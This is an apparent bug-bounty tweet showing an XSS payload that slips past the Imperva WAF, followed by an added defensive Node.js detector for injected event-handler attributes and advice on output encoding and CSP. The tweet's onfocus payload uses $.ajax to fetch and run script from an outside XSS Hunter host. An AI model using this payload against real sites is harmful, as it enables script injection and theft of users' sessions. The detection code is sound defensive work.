+ onfocus=xxxx --> Blocked
+ onfocus=$.ajax({url:'http://'.concat('yourxsshunder .xss.ht'),dataType:'script',success:'success'}) --> Boom!
@Hacker0x01 #XSS #bugbountytips bypass Imperva https://t.co/dB0DwQFDEl
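
A defender-side look at the two payloads above, as an added example that is not part of the original post: whatever the reason the second payload passed the filter, this Node.js check keys on the injected `on*=` attribute name rather than the handler body, and separately notes jQuery remote-script loading. The function names, the sample values and the `collector.example` host are constructed, and treating the leading `+` as a form-encoded space is an assumption.

```javascript
// Added example (not from the original post). Sample inputs are constructed.

// Decode a form-encoded parameter value; '+' is treated as a space (assumption).
function decodeParam(raw) {
  const spaced = raw.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(spaced);
  } catch (e) {
    return spaced; // malformed percent-escapes: inspect the text as received
  }
}

// on<event>= at start of input or after a character that can precede an
// attribute name. Heuristic: keyed on the attribute name, not the handler body.
const HANDLER_ATTR = /(?:^|[\s"'`\/])(on[a-z]{3,})\s*=\s*/gi;

// jQuery calls that fetch and evaluate a remote script.
const SCRIPT_LOADERS = [
  /(?:\$|jQuery)\s*\.\s*getScript\s*\(/i,
  /(?:\$|jQuery)\s*\.\s*ajax\s*\([\s\S]*dataType\s*:\s*["'`]script["'`]/i,
];

function inspectParam(raw) {
  // Fold typographic quotes to ASCII so pasted payloads are matched as well.
  const text = decodeParam(raw)
    .replace(/[\u2018\u2019]/g, "'")
    .replace(/[\u201C\u201D]/g, '"');
  const findings = [];
  for (const m of text.matchAll(HANDLER_ATTR)) {
    const body = text.slice(m.index + m[0].length);
    findings.push({
      attribute: m[1].toLowerCase(),
      loadsRemoteScript: SCRIPT_LOADERS.some((re) => re.test(body)),
    });
  }
  return findings;
}

// Constructed parameter values modelled on the two lines of the post.
const SAMPLES = [
  '+onfocus=xxxx',
  "+onfocus=$.ajax({url:'http://'.concat('collector.example'),dataType:'script',success:'success'})",
  'running+shoes+online',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(inspectParam(s)), '<-', s);
}
```

Both handler payloads produce a finding on the attribute name alone, so the handler body cannot decide whether the request is flagged. The durable fix remains context-aware output encoding at the reflection point, plus a Content-Security-Policy without `'unsafe-inline'`, which stops inline event handlers from executing.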